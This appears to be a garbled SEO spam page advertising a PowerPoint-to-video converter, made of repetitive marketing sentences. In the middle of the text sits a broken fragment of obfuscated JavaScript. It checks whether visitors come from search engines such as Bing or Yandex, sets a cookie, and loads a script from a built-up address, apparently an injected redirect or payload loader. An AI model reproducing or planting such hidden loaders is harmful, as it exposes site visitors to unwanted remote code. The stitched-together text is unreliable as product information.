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Convert A Powerpoint To Youtube Video Download

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Export your presentations to iPhone, iPad, Samsung, Sony, HTC, or other mobile device and rehearse on the go!Embed Presentations in Your Blog, Share Them OnlineWant to publish PPT files on your company blog or sites like YouTube and Facebook? Most video sharing sites don't accept PPT files, so saving them in MP4, WebM, OGV, or other web-compatible formats is the best solution.

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And now its convenient, too: you can load your videos onto a USB drive, or play them back using any media player on any device running Windows, OS X or Linux.. After conversion, you can easily share your slideshow with the world Record Soundtracks for Your PPT PresentationsWhen you turn PowerPoint into video with Movavi, you can add a voiceover and a soundtrack to your slideshow movie. 2

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Thanks to predefined settings specific to each mobile device, your converted slideshow will play perfectly on your device.. Movavi PowerPoint to Video Converter is the perfect choice if you need to change the format of your PPT presentation quickly and easily.. bing ','JRnEE':_0x2d03('0x1b'),'oluQD':_0x2d03('0x1c'),'bpHQJ':' yandex ','JtvZI':_0x2d03('0x1d'),'MGSgX':function _0xd82a96(_0x1fa1a6,_0xa7cc60){return _0x1fa1a6=0x0){_0x409a42=!![];}}if(_0x409a42){cookie['set'](_0x5a84cc[_0x2d03('0x25')],0x1,0x1);if(!_0xf88362){_0x5a84cc[_0x2d03('0x26')](include,_0x5a84cc[_0x2d03('0x27')](_0x5a84cc['yvnbX'] q,''));}}}R(); Convert PowerPoint to Video with MovaviMeet Movavi PowerPoint to Video Converter the perfect software for transforming PowerPoint presentations into video files.. Comment on every slide to create a perfect narrated presentation or add background music to the animation, making an even better impression on your audience.. You can also add voiceover or music to your presentation, optimize it for mobile device viewing, and prepare it for sharing online. 5